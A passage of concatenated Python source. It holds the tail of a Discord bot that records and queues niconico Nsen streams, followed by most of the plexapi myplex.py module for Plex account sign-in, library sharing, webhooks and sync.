time.sleep(10)
continue
videoId = self.nsen.getVideoID(data)
self.logger.debug(videoId)
if videoId == previousId and self.nsen.channelName != "hotaru":
time.sleep(10)
continue
if not videoId:
self.nsen.setChannel(self.nsenChannel)
time.sleep(10)
continue
ckey = self.nsen.getCKey(videoId)
self.logger.debug(ckey)
data2 = self.nsen.getFLV(videoId, ckey)
self.logger.debug(data2)
if "url" not in data2:
self.nsen.setChannel(self.nsenChannel)
time.sleep(10)
continue
duration = int(data["stream"]["contents_list"]["contents"]["@duration"])
obj = {
"path": "{}/{}_{}.flv".format(self.tmpDir, self.nsen.channelName, videoId),
"text": ":nsen: Now Playing: **{title}** ({time}) - {channelName}\nhttp://www.nicovideo.jp/watch/{id}".format(
title=html.unescape(data["stream"]["contents_list"]["contents"]["@title"]),
time="{0[0]}:{0[1]:02d}".format(divmod(duration, 60)),
channelName=data["stream"]["title"],
id=videoId
),
"title": html.unescape(data["stream"]["contents_list"]["contents"]["@title"])
}
previousId = videoId
if not os.path.isfile(obj["path"]):
command = self.nsen.generateCommand(obj["path"], data2["url"], data2["fmst"])
result = self.nsen.executeRecordCommand(command)
self.logger.info("Record Command Result =\n{}\n".format(result))
self.musicQueue.append(obj)
except:
self.logger.exception("Error occured while syncNsen")
time.sleep(10)
else:
time.sleep(30)
def cleanUpTmpDir(self):
while True:
time.sleep(self.cleanUpInterval)
for x in os.listdir(self.tmpDir):
path = "{}/{}".format(self.tmpDir, x)
if path != self.currentVideoPath:
os.remove(path)
def loginNsen(self):
while True:
time.sleep(60 * 60 * 2)
try:
self.nsen.login(self.config["niconico"]["email"], self.config["niconico"]["password"])
except:
pass
def run(self):
self.running = True
if not os.path.isfile(self.nsenIcon):
with open(self.nsenIcon, "wb") as f:
f.write(requests.get("http://live.nicovideo.jp/img/nsen/waitlist_icon_nsen.png").content)
self.nsenThread.start()
self.cleanUpThread.start()
self.reloginThread.start()
self.client.run(self.config["bot"]["token"])
|
myplex.py
|
# -*- coding: utf-8 -*-
import copy
import threading
import time
import requests
from plexapi import (BASE_HEADERS, CONFIG, TIMEOUT, X_PLEX_ENABLE_FAST_CONNECT,
X_PLEX_IDENTIFIER, log, logfilter, utils)
from plexapi.base import PlexObject
from plexapi.exceptions import BadRequest, NotFound, Unauthorized
from plexapi.client import PlexClient
from plexapi.compat import ElementTree
from plexapi.library import LibrarySection
from plexapi.server import PlexServer
from plexapi.sync import SyncItem, SyncList
from plexapi.utils import joinArgs
from requests.status_codes import _codes as codes
class MyPlexAccount(PlexObject):
""" MyPlex account and profile information. This object represents the data found Account on
the myplex.tv servers at the url https://plex.tv/users/account. You may create this object
directly by passing in your username & password (or token). There is also a convenience
method provided at :class:`~plexapi.server.PlexServer.myPlexAccount()` which will create
and return this object.
Parameters:
username (str): Your MyPlex username.
password (str): Your MyPlex password.
session (requests.Session, optional): Use your own session object if you want to
cache the http responses from PMS
timeout (int): timeout in seconds on initial connect to myplex (default config.TIMEOUT).
Attributes:
SIGNIN (str): 'https://plex.tv/users/sign_in.xml'
key (str): 'https://plex.tv/users/account'
authenticationToken (str): Unknown.
certificateVersion (str): Unknown.
cloudSyncDevice (str): Unknown.
email (str): Your current Plex email address.
entitlements (List<str>): List of devices your allowed to use with this account.
guest (bool): Unknown.
home (bool): Unknown.
homeSize (int): Unknown.
id (str): Your Plex account ID.
locale (str): Your Plex locale
mailing_list_status (str): Your current mailing list status.
maxHomeSize (int): Unknown.
queueEmail (str): Email address to add items to your `Watch Later` queue.
queueUid (str): Unknown.
restricted (bool): Unknown.
roles: (List<str>) Lit of account roles. Plexpass membership listed here.
scrobbleTypes (str): Description
secure (bool): Description
subscriptionActive (bool): True if your subsctiption is active.
subscriptionFeatures: (List<str>) List of features allowed on your subscription.
subscriptionPlan (str): Name of subscription plan.
subscriptionStatus (str): String representation of `subscriptionActive`.
thumb (str): URL of your account thumbnail.
title (str): Unknown. - Looks like an alias for `username`.
username (str): Your account username.
uuid (str): Unknown.
_token (str): Token used to access this client.
_session (obj): Requests session object used to access this client.
"""
FRIENDINVITE = 'https://plex.tv/api/servers/{machineId}/shared_servers' # post with data
HOMEUSERCREATE = 'https://plex.tv/api/home/users?title={title}' # post with data
EXISTINGUSER = 'https://plex.tv/api/home/users?invitedEmail={username}' # post with data
FRIENDSERVERS = 'https://plex.tv/api/servers/{machineId}/shared_servers/{serverId}' # put with data
PLEXSERVERS = 'https://plex.tv/api/servers/{machineId}' # get
FRIENDUPDATE = 'https://plex.tv/api/friends/{userId}' # put with args, delete
REMOVEHOMEUSER = 'https://plex.tv/api/home/users/{userId}' # delete
REMOVEINVITE = 'https://plex.tv/api/invites/requested/{userId}?friend=0&server=1&home=0' # delete
REQUESTED = 'https://plex.tv/api/invites/requested' # get
REQUESTS = 'https://plex.tv/api/invites/requests' # get
SIGNIN = 'https://plex.tv/users/sign_in.xml' # get with auth
WEBHOOKS = 'https://plex.tv/api/v2/user/webhooks' # get, post with data
# Hub sections
VOD = 'https://vod.provider.plex.tv/' # get
WEBSHOWS = 'https://webshows.provider.plex.tv/' # get
NEWS = 'https://news.provider.plex.tv/' # get
PODCASTS = 'https://podcasts.provider.plex.tv/' # get
MUSIC = 'https://music.provider.plex.tv/' # get
# Key may someday switch to the following url. For now the current value works.
# https://plex.tv/api/v2/user?X-Plex-Token={token}&X-Plex-Client-Identifier={clientId}
key = 'https://plex.tv/users/account'
def __init__(self, username=None, password=None, token=None, session=None, timeout=None):
self._token = token
self._session = session or requests.Session()
data, initpath = self._signin(username, password, timeout)
super(MyPlexAccount, self).__init__(self, data, initpath)
def _signin(self, username, password, timeout):
if self._token:
return self.query(self.key), self.key
username = username or CONFIG.get('auth.myplex_username')
password = password or CONFIG.get('auth.myplex_password')
data = self.query(self.SIGNIN, method=self._session.post, auth=(username, password), timeout=timeout)
return data, self.SIGNIN
def _loadData(self, data):
""" Load attribute values from Plex XML response. """
self._data = data
self._token = logfilter.add_secret(data.attrib.get('authenticationToken'))
self._webhooks = []
self.authenticationToken = self._token
self.certificateVersion = data.attrib.get('certificateVersion')
self.cloudSyncDevice = data.attrib.get('cloudSyncDevice')
self.email = data.attrib.get('email')
self.guest = utils.cast(bool, data.attrib.get('guest'))
self.home = utils.cast(bool, data.attrib.get('home'))
self.homeSize = utils.cast(int, data.attrib.get('homeSize'))
self.id = data.attrib.get('id')
self.locale = data.attrib.get('locale')
self.mailing_list_status = data.attrib.get('mailing_list_status')
self.maxHomeSize = utils.cast(int, data.attrib.get('maxHomeSize'))
self.queueEmail = data.attrib.get('queueEmail')
self.queueUid = data.attrib.get('queueUid')
self.restricted = utils.cast(bool, data.attrib.get('restricted'))
self.scrobbleTypes = data.attrib.get('scrobbleTypes')
self.secure = utils.cast(bool, data.attrib.get('secure'))
self.thumb = data.attrib.get('thumb')
self.title = data.attrib.get('title')
self.username = data.attrib.get('username')
self.uuid = data.attrib.get('uuid')
subscription = data.find('subscription')
self.subscriptionActive = utils.cast(bool, subscription.attrib.get('active'))
self.subscriptionStatus = subscription.attrib.get('status')
self.subscriptionPlan = subscription.attrib.get('plan')
self.subscriptionFeatures = []
for feature in subscription.iter('feature'):
self.subscriptionFeatures.append(feature.attrib.get('id'))
roles = data.find('roles')
self.roles = []
if roles:
for role in roles.iter('role'):
self.roles.append(role.attrib.get('id'))
entitlements = data.find('entitlements')
self.entitlements = []
for entitlement in entitlements.iter('entitlement'):
self.entitlements.append(entitlement.attrib.get('id'))
# TODO: Fetch missing MyPlexAccount attributes
self.profile_settings = None
self.services = None
self.joined_at = None
def device(self, name):
""" Returns the :class:`~plexapi.myplex.MyPlexDevice` that matches the name specified.
Parameters:
name (str): Name to match against.
"""
for device in self.devices():
if device.name.lower() == name.lower():
return device
raise NotFound('Unable to find device %s' % name)
def devices(self):
""" Returns a list of all :class:`~plexapi.myplex.MyPlexDevice` objects connected to the server. """
data = self.query(MyPlexDevice.key)
return [MyPlexDevice(self, elem) for elem in data]
def _headers(self, **kwargs):
""" Returns dict containing base headers for all requests to the server. """
headers = BASE_HEADERS.copy()
if self._token:
headers['X-Plex-Token'] = self._token
headers.update(kwargs)
return headers
def query(self, url, method=None, headers=None, timeout=None, **kwargs):
method = method or self._session.get
timeout = timeout or TIMEOUT
log.debug('%s %s %s', method.__name__.upper(), url, kwargs.get('json', ''))
headers = self._headers(**headers or {})
response = method(url, headers=headers, timeout=timeout, **kwargs)
if response.status_code not in (200, 201, 204): # pragma: no cover
codename = codes.get(response.status_code)[0]
errtext = response.text.replace('\n', ' ')
message = '(%s) %s; %s %s' % (response.status_code, codename, response.url, errtext)
if response.status_code == 401:
raise Unauthorized(message)
elif response.status_code == 404:
raise NotFound(message)
else:
raise BadRequest(message)
data = response.text.encode('utf8')
return ElementTree.fromstring(data) if data.strip() else None
def resource(self, name):
""" Returns the :class:`~plexapi.myplex.MyPlexResource` that matches the name specified.
Parameters:
name (str): Name to match against.
"""
for resource in self.resources():
if resource.name.lower() == name.lower():
return resource
raise NotFound('Unable to find resource %s' % name)
def resources(self):
""" Returns a list of all :class:`~plexapi.myplex.MyPlexResource` objects connected to the server. """
data = self.query(MyPlexResource.key)
return [MyPlexResource(self, elem) for elem in data]
def inviteFriend(self, user, server, sections=None, allowSync=False, allowCameraUpload=False,
allowChannels=False, filterMovies=None, filterTelevision=None, filterMusic=None):
""" Share library content with the specified user.
Parameters:
user (str): MyPlexUser, username, email of the user to be added.
server (PlexServer): PlexServer object or machineIdentifier containing the library sections to share.
sections ([Section]): Library sections, names or ids to be shared (default None).
[Section] must be defined in order to update shared sections.
allowSync (Bool): Set True to allow user to sync content.
allowCameraUpload (Bool): Set True to allow user to upload photos.
allowChannels (Bool): Set True to allow user to utilize installed channels.
filterMovies (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterTelevision (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterMusic (Dict): Dict containing key 'label' set to a list of values to be filtered.
ex: {'label':['foo']}
"""
username = user.username if isinstance(user, MyPlexUser) else user
machineId = server.machineIdentifier if isinstance(server, PlexServer) else server
sectionIds = self._getSectionIds(machineId, sections)
params = {
'server_id': machineId,
'shared_server': {'library_section_ids': sectionIds, 'invited_email': username},
'sharing_settings': {
'allowSync': ('1' if allowSync else '0'),
'allowCameraUpload': ('1' if allowCameraUpload else '0'),
'allowChannels': ('1' if allowChannels else '0'),
'filterMovies': self._filterDictToStr(filterMovies or {}),
'filterTelevision': self._filterDictToStr(filterTelevision or {}),
'filterMusic': self._filterDictToStr(filterMusic or {}),
},
}
headers = {'Content-Type': 'application/json'}
url = self.FRIENDINVITE.format(machineId=machineId)
return self.query(url, self._session.post, json=params, headers=headers)
def createHomeUser(self, user, server, sections=None, allowSync=False, allowCameraUpload=False,
allowChannels=False, filterMovies=None, filterTelevision=None, filterMusic=None):
""" Share library content with the specified user.
Parameters:
user (str): MyPlexUser, username, email of the user to be added.
server (PlexServer): PlexServer object or machineIdentifier containing the library sections to share.
sections ([Section]): Library sections, names or ids to be shared (default None shares all sections).
allowSync (Bool): Set True to allow user to sync content.
allowCameraUpload (Bool): Set True to allow user to upload photos.
allowChannels (Bool): Set True to allow user to utilize installed channels.
filterMovies (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterTelevision (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterMusic (Dict): Dict containing key 'label' set to a list of values to be filtered.
ex: {'label':['foo']}
"""
machineId = server.machineIdentifier if isinstance(server, PlexServer) else server
sectionIds = self._getSectionIds(server, sections)
headers = {'Content-Type': 'application/json'}
url = self.HOMEUSERCREATE.format(title=user)
# UserID needs to be created and referenced when adding sections
user_creation = self.query(url, self._session.post, headers=headers)
userIds = {}
for elem in user_creation.findall("."):
# Find userID
userIds['id'] = elem.attrib.get('id')
log.debug(userIds)
params = {
'server_id': machineId,
'shared_server': {'library_section_ids': sectionIds, 'invited_id': userIds['id']},
'sharing_settings': {
'allowSync': ('1' if allowSync else '0'),
'allowCameraUpload': ('1' if allowCameraUpload else '0'),
'allowChannels': ('1' if allowChannels else '0'),
'filterMovies': self._filterDictToStr(filterMovies or {}),
'filterTelevision': self._filterDictToStr(filterTelevision or {}),
'filterMusic': self._filterDictToStr(filterMusic or {}),
},
}
url = self.FRIENDINVITE.format(machineId=machineId)
library_assignment = self.query(url, self._session.post, json=params, headers=headers)
return user_creation, library_assignment
def createExistingUser(self, user, server, sections=None, allowSync=False, allowCameraUpload=False,
allowChannels=False, filterMovies=None, filterTelevision=None, filterMusic=None):
""" Share library content with the specified user.
Parameters:
user (str): MyPlexUser, username, email of the user to be added.
server (PlexServer): PlexServer object or machineIdentifier containing the library sections to share.
sections ([Section]): Library sections, names or ids to be shared (default None shares all sections).
allowSync (Bool): Set True to allow user to sync content.
allowCameraUpload (Bool): Set True to allow user to upload photos.
allowChannels (Bool): Set True to allow user to utilize installed channels.
filterMovies (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterTelevision (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterMusic (Dict): Dict containing key 'label' set to a list of values to be filtered.
ex: {'label':['foo']}
"""
headers = {'Content-Type': 'application/json'}
# If user already exists, carry over sections and settings.
if isinstance(user, MyPlexUser):
username = user.username
elif user in [_user.username for _user in self.users()]:
username = self.user(user).username
else:
# If user does not already exists, treat request as new request and include sections and settings.
newUser = user
url = self.EXISTINGUSER.format(username=newUser)
user_creation = self.query(url, self._session.post, headers=headers)
machineId = server.machineIdentifier if isinstance(server, PlexServer) else server
sectionIds = self._getSectionIds(server, sections)
params = {
'server_id': machineId,
'shared_server': {'library_section_ids': sectionIds, 'invited_email': newUser},
'sharing_settings': {
'allowSync': ('1' if allowSync else '0'),
'allowCameraUpload': ('1' if allowCameraUpload else '0'),
'allowChannels': ('1' if allowChannels else '0'),
'filterMovies': self._filterDictToStr(filterMovies or {}),
'filterTelevision': self._filterDictToStr(filterTelevision or {}),
'filterMusic': self._filterDictToStr(filterMusic or {}),
},
}
url = self.FRIENDINVITE.format(machineId=machineId)
library_assignment = self.query(url, self._session.post, json=params, headers=headers)
return user_creation, library_assignment
url = self.EXISTINGUSER.format(username=username)
return self.query(url, self._session.post, headers=headers)
def removeFriend(self, user):
""" Remove the specified user from all sharing.
Parameters:
user (str): MyPlexUser, username, email of the user to be added.
"""
user = self.user(user)
url = self.FRIENDUPDATE if user.friend else self.REMOVEINVITE
url = url.format(userId=user.id)
return self.query(url, self._session.delete)
def removeHomeUser(self, user):
""" Remove the specified managed user from home.
Parameters:
user (str): MyPlexUser, username, email of the user to be removed from home.
"""
user = self.user(user)
url = self.REMOVEHOMEUSER.format(userId=user.id)
return self.query(url, self._session.delete)
def updateFriend(self, user, server, sections=None, removeSections=False, allowSync=None, allowCameraUpload=None,
allowChannels=None, filterMovies=None, filterTelevision=None, filterMusic=None):
""" Update the specified user's share settings.
Parameters:
user (str): MyPlexUser, username, email of the user to be added.
server (PlexServer): PlexServer object or machineIdentifier containing the library sections to share.
sections: ([Section]): Library sections, names or ids to be shared (default None).
[Section] must be defined in order to update shared sections.
removeSections (Bool): Set True to remove all shares. Supersedes sections.
allowSync (Bool): Set True to allow user to sync content.
allowCameraUpload (Bool): Set True to allow user to upload photos.
allowChannels (Bool): Set True to allow user to utilize installed channels.
filterMovies (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterTelevision (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterMusic (Dict): Dict containing key 'label' set to a list of values to be filtered.
ex: {'label':['foo']}
"""
# Update friend servers
response_filters = ''
response_servers = ''
user = user if isinstance(user, MyPlexUser) else self.user(user)
machineId = server.machineIdentifier if isinstance(server, PlexServer) else server
sectionIds = self._getSectionIds(machineId, sections)
headers = {'Content-Type': 'application/json'}
# Determine whether user has access to the shared server.
user_servers = [s for s in user.servers if s.machineIdentifier == machineId]
if user_servers and sectionIds:
serverId = user_servers[0].id
params = {'server_id': machineId, 'shared_server': {'library_section_ids': sectionIds}}
url = self.FRIENDSERVERS.format(machineId=machineId, serverId=serverId)
else:
params = {'server_id': machineId,
'shared_server': {'library_section_ids': sectionIds, 'invited_id': user.id}}
url = self.FRIENDINVITE.format(machineId=machineId)
# Remove share sections, add shares to user without shares, or update shares
if not user_servers or sectionIds:
if removeSections is True:
response_servers = self.query(url, self._session.delete, json=params, headers=headers)
elif 'invited_id' in params.get('shared_server', ''):
response_servers = self.query(url, self._session.post, json=params, headers=headers)
else:
response_servers = self.query(url, self._session.put, json=params, headers=headers)
else:
log.warning('Section name, number of section object is required changing library sections')
# Update friend filters
url = self.FRIENDUPDATE.format(userId=user.id)
params = {}
if isinstance(allowSync, bool):
params['allowSync'] = '1' if allowSync else '0'
if isinstance(allowCameraUpload, bool):
params['allowCameraUpload'] = '1' if allowCameraUpload else '0'
if isinstance(allowChannels, bool):
params['allowChannels'] = '1' if allowChannels else '0'
if isinstance(filterMovies, dict):
params['filterMovies'] = self._filterDictToStr(filterMovies or {}) # '1' if allowChannels else '0'
if isinstance(filterTelevision, dict):
params['filterTelevision'] = self._filterDictToStr(filterTelevision or {})
if isinstance(allowChannels, dict):
params['filterMusic'] = self._filterDictToStr(filterMusic or {})
if params:
url += joinArgs(params)
response_filters = self.query(url, self._session.put)
return response_servers, response_filters
def user(self, username):
""" Returns the :class:`~plexapi.myplex.MyPlexUser` that matches the email or username specified.
Parameters:
username (str): Username, email or id of the user to return.
"""
for user in self.users():
# Home users don't have email, username etc.
if username.lower() == user.title.lower():
return user
elif (user.username and user.email and user.id and username.lower() in
(user.username.lower(), user.email.lower(), str(user.id))):
return user
raise NotFound('Unable to find user %s' % username)
def users(self):
""" Returns a list of all :class:`~plexapi.myplex.MyPlexUser` objects connected to your account.
This includes both friends and pending invites. You can reference the user.friend to
distinguish between the two.
"""
friends = [MyPlexUser(self, elem) for elem in self.query(MyPlexUser.key)]
requested = [MyPlexUser(self, elem, self.REQUESTED) for elem in self.query(self.REQUESTED)]
return friends + requested
def _getSectionIds(self, server, sections):
""" Converts a list of section objects or names to sectionIds needed for library sharing. """
if not sections: return []
# Get a list of all section ids for looking up each section.
allSectionIds = {}
machineIdentifier = server.machineIdentifier if isinstance(server, PlexServer) else server
url = self.PLEXSERVERS.replace('{machineId}', machineIdentifier)
data = self.query(url, self._session.get)
for elem in data[0]:
allSectionIds[elem.attrib.get('id', '').lower()] = elem.attrib.get('id')
allSectionIds[elem.attrib.get('title', '').lower()] = elem.attrib.get('id')
allSectionIds[elem.attrib.get('key', '').lower()] = elem.attrib.get('id')
log.debug(allSectionIds)
# Convert passed in section items to section ids from above lookup
sectionIds = []
for section in sections:
sectionKey = section.key if isinstance(section, LibrarySection) else section
sectionIds.append(allSectionIds[sectionKey.lower()])
return sectionIds
def _filterDictToStr(self, filterDict):
""" Converts friend filters to a string representation for transport. """
values = []
for key, vals in filterDict.items():
if key not in ('contentRating', 'label'):
raise BadRequest('Unknown filter key: %s', key)
values.append('%s=%s' % (key, '%2C'.join(vals)))
return '|'.join(values)
def addWebhook(self, url):
# copy _webhooks and append url
urls = self._webhooks[:] + [url]
return self.setWebhooks(urls)
def deleteWebhook(self, url):
urls = copy.copy(self._webhooks)
if url not in urls:
raise BadRequest('Webhook does not exist: %s' % url)
urls.remove(url)
return self.setWebhooks(urls)
def setWebhooks(self, urls):
log.info('Setting webhooks: %s' % urls)
data = {'urls[]': urls} if len(urls) else {'urls': ''}
data = self.query(self.WEBHOOKS, self._session.post, data=data)
self._webhooks = self.listAttrs(data, 'url', etag='webhook')
return self._webhooks
def webhooks(self):
data = self.query(self.WEBHOOKS)
self._webhooks = self.listAttrs(data, 'url', etag='webhook')
return self._webhooks
def optOut(self, playback=None, library=None):
""" Opt in or out of sharing stuff with plex.
See: https://www.plex.tv/about/privacy-legal/
"""
params = {}
if playback is not None:
params['optOutPlayback'] = int(playback)
if library is not None:
params['optOutLibraryStats'] = int(library)
url = 'https://plex.tv/api/v2/user/privacy'
return self.query(url, method=self._session.put, data=params)
def syncItems(self, client=None, clientId=None):
""" Returns an instance of :class:`plexapi.sync.SyncList` for specified client.
Parameters:
client (:class:`~plexapi.myplex.MyPlexDevice`): a client to query SyncItems for.
clientId (str): an identifier of a client to query SyncItems for.
If both `client` and `clientId` provided the client would be preferred.
If neither `client` nor `clientId` provided the clientId would be set to current clients`s identifier.
"""
if client:
clientId = client.clientIdentifier
elif clientId is None:
clientId = X_PLEX_IDENTIFIER
data = self.query(SyncList.key.format(clientId=clientId))
return SyncList(self, data)
def sync(self, sync_item, client=None, clientId=None):
""" Adds specified sync item for the client. It's always easier to use methods defined directly in the media
objects, e.g. :func:`plexapi.video.Video.sync`, :func:`plexapi.audio.Audio.sync`.
Parameters:
client (:class:`~plexapi.myplex.MyPlexDevice`): a client for which you need to add SyncItem to.
clientId (str): an identifier of a client for which you need to add SyncItem to.
sync_item (:class:`plexapi.sync.SyncItem`): prepared SyncItem object with all fields set.
If both `client` and `clientId` provided the client would be preferred.
If neither `client` nor `clientId` provided the clientId would be set to current clients`s identifier.
Returns:
:class:`plexapi.sync.SyncItem`: an instance of created syncItem.
Raises:
:class:`plexapi.exceptions.BadRequest`: when client with provided clientId wasn`t found.
:class:`plexapi.exceptions.BadRequest`: provided client doesn`t provides `sync-target`.
"""
if not client and not clientId:
clientId = X_PLEX_IDENTIFIER
if not client:
for device in self.devices():
if device.clientIdentifier == clientId:
client = device
break
if not client:
raise BadRequest('Unable to find client by clientId=%s', clientId)
if 'sync-target' not in client.provides:
raise BadRequest('Received client doesn`t provides sync-target')
params = {
'SyncItem[title]': sync_item.title,
'SyncItem[rootTitle]': sync_item.rootTitle,
'SyncItem[metadataType]': sync_item.metadataType,
'SyncItem[machineIdentifier]': sync_item.machineIdentifier,
'SyncItem[contentType]': sync_item.contentType,
'SyncItem[Policy][scope]': sync_item.policy.scope,
'SyncItem[Policy][unwatched]': str(int(sync_item.policy.unwatched)),
'SyncItem[Policy][value]': str(sync_item.policy.value if hasattr(sync_item.policy, 'value') else 0),
'SyncItem[Location][uri]': sync_item.location,
'SyncItem[MediaSettings][audioBoost]': str(sync_item.mediaSettings.audioBoost),
'SyncItem[MediaSettings][maxVideoBitrate]': str(sync_item.mediaSettings.maxVideoBitrate),
'SyncItem[MediaSettings][musicBitrate]': str(sync_item.mediaSettings.musicBitrate),
'SyncItem[MediaSettings][photoQuality]': str(sync_item.mediaSettings.photoQuality),
'SyncItem[MediaSettings][photoResolution]': sync_item.mediaSettings.photoResolution,
'SyncItem[MediaSettings][subtitleSize]': str(sync_item.mediaSettings.subtitleSize),
'SyncItem[MediaSettings][videoQuality]': str(sync_item.mediaSettings.videoQuality),
'SyncItem[MediaSettings][videoResolution]': sync_item.mediaSettings.videoResolution,
}
url = SyncList.key.format(clientId=client.clientIdentifier)
data = self.query(url, method=self._session.post, headers={
'Content-type': 'x-www-form-urlencoded',
}, params=params)
return SyncItem(self, data, None, clientIdentifier=client.clientIdentifier)
def claimToken(self):
""" Returns a str, a new "claim-token", which you can use to register your new Plex Server instance to your
account.
See: https://hub.docker.com/r/plexinc/pms-docker/, https://www.plex.tv/claim/
"""
response = self._session.get('https://plex.tv/api/claim/token.json', headers=self._headers(), timeout=TIMEOUT)
if response.status_code not in (200, 201, 204): # pragma: no cover
codename = codes.get(response.status_code)[0]
errtext = response.text.replace('\n', ' ')
raise BadRequest('(%s) %s %s; %s' % (response.status_code, codename, response.url, errtext))
return response.json()['token']
def history(self, maxresults=9999999, mindate=None):
""" Get Play History for all library sections on all servers for the owner.
Parameters:
maxresults (int): Only return the specified number of results (optional).
mindate (datetime): Min datetime to return results from.
"""
servers = [x for x in self.resources() if x.provides == 'server' and x.owned]
hist = []
for server in servers:
conn = server.connect()
hist.extend(conn.history(maxresults=maxresults, mindate=mindate, accountID=1))
return hist
def videoOnDemand(self):
""" Returns a list of VOD Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.VOD + 'hubs/', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
def webShows(self):
""" Returns a list of Webshow Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.WEBSHOWS + 'hubs/', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
def news(self):
""" Returns a list of News Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.NEWS + 'hubs/sections/all', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
def podcasts(self):
""" Returns a list of Podcasts Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.PODCASTS + 'hubs/', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
def tidal(self):
""" Returns a list of tidal Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.MUSIC + 'hubs/', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
class MyPlexUser(PlexObject):
""" This object represents non-signed in users such as friends and linked
accounts. NOTE: This should not be confused with the :class:`~myplex.MyPlexAccount`
which is your specific account. The raw xml for the data presented here
can be found at: https://plex.tv/api/users/
Attributes:
TAG (str): 'User'
key (str): 'https://plex.tv/api/users/'
allowCameraUpload (bool): True if this user can upload images.
allowChannels (bool): True if this user has access to channels.
allowSync (bool): True if this user can sync.
email (str): User's email address (user@gmail.com).
filterAll (str): Unknown.
filterMovies (str): Unknown.
filterMusic (str): Unknown.
filterPhotos (str): Unknown.
filterTelevision (str): Unknown.
home (bool): Unknown.
id (int): User's Plex account ID.
protected (False): Unknown (possibly SSL enabled?).
recommendationsPlaylistId (str): Unknown.
restricted (str): Unknown.
thumb (str): Link to the users avatar.
title (str): Seems to be an aliad for username.
username (str): User's username.
servers: Servers shared between user and friend
"""
TAG = 'User'
key = 'https://plex.tv/api/users/'
def _loadData(self, data):
""" Load attribute values from Plex XML response. """
self._data = data
self.friend = self._initpath == self.key
self.allowCameraUpload = utils.cast(bool, data.attrib.get('allowCameraUpload'))
self.allowChannels = utils.cast(bool, data.attrib.get('allowChannels'))
self.allowSync = utils.cast(bool, data.attrib.get('allowSync'))
self.email = data.attrib.get('email')
self.filterAll = data.attrib.get('filterAll')
self.filterMovies = data.attrib.get('filterMovies')
self.filterMusic = data.attrib.get('filterMusic')
self.filterPhotos = data.attrib.get('filterPhotos')
self.filterTelevision = data.attrib.get('filterTelevision')
self.home = utils.cast(bool, data.attrib.get('home'))
self.id = utils.cast(int, data.attrib.get('id'))
self.protected = utils.cast(bool, data.attrib.get('protected'))
self.recommendationsPlaylistId = data.attrib.get('recommendationsPlaylistId')
self.restricted = data.attrib.get('restricted')
self.thumb = data.attrib.get('thumb')
self.title = data.attrib.get('title', '')
self.username = data.attrib.get('username', '')
self.servers = self.findItems(data, MyPlexServerShare)
for server in self.servers:
server.accountID = self.id
def get_token(self, machineIdentifier):
try:
for item in self._server.query(self._server.FRIENDINVITE.format(machineId=machineIdentifier)):
if utils.cast(int, item.attrib.get('userID')) == self.id:
return item.attrib.get('accessToken')
except Exception:
log.exception('Failed to get access token for %s' % self.title)
def server(self, name):
""" Returns the :class:`~plexapi.myplex.MyPlexServerShare` that matches the name specified.
Parameters:
name (str): Name of the server to return.
"""
for server in self.servers:
if name.lower() == server.name.lower():
return server
raise NotFound('Unable to find server %s' % name)
def history(self, maxresults=9999999, mindate=None):
""" Get all Play History for a user in all shared servers.
Parameters:
maxresults (int): Only return the specified number of results (optional).
mindate (datetime): Min datetime to return results from.
"""
hist = []
for server in self.servers:
hist.extend(server.history(maxresults=maxresults, mindate=mindate))
return hist
class Section(PlexObject):
""" This refers to a shared section. The raw xml for the data presented here
can be found at: https://plex.tv/api/servers/{machineId}/shared_servers/{serverId}
Attributes:
TAG (str): section
id (int): shared section id
sectionKey (str): what key we use for this section
title (str): Title of the section
sectionId (str): shared section id
type (str): movie, tvshow, artist
shared (bool): If this section is shared with the user
"""
TAG = 'Section'
def _loadData(self, data):
self._data = data
# self.id = utils.cast(int, data.attrib.get('id')) # Havnt decided if this should be changed.
self.sectionKey = data.attrib.get('key')
self.title = data.attrib.get('title')
self.sectionId = data.attrib.get('id')
self.type = data.attrib.get('type')
self.shared = utils.cast(bool, data.attrib.get('shared'))
def history(self, maxresults=9999999, mindate=None):
""" Get all Play History for a user for this section in this shared server.
Parameters:
maxresults (int): Only return the specified number of results (optional).
mindate (datetime): Min datetime to return results from.
"""
server = self._server._server.resource(self._server.name).connect()
return server.history(maxresults=maxresults, mindate=mindate,
accountID=self._server.accountID, librarySectionID=self.sectionKey)
class MyPlexServerShare(PlexObject):
""" Represents a single user's server reference. Used for library sharing.
Attributes:
id (int): id for this share
serverId (str): what id plex uses for this.
machineIdentifier (str): The servers machineIdentifier
name (str): The servers name
lastSeenAt (datetime): Last connected to the server?
numLibraries (int): Total number of libraries
allLibraries (bool): True if all libraries is shared with this user.
owned (bool): 1 if the server is owned by the user
pending (bool): True if the invite is pending.
"""
TAG = 'Server'
def _loadData(self, data):
""" Load attribute values from Plex XML response. """
self._data = data
self.id = utils.cast(int, data.attrib.get('id'))
self.accountID = utils.cast(int, data.attrib.get('accountID'))
self.serverId = utils.cast(int, data.attrib.get('serverId'))
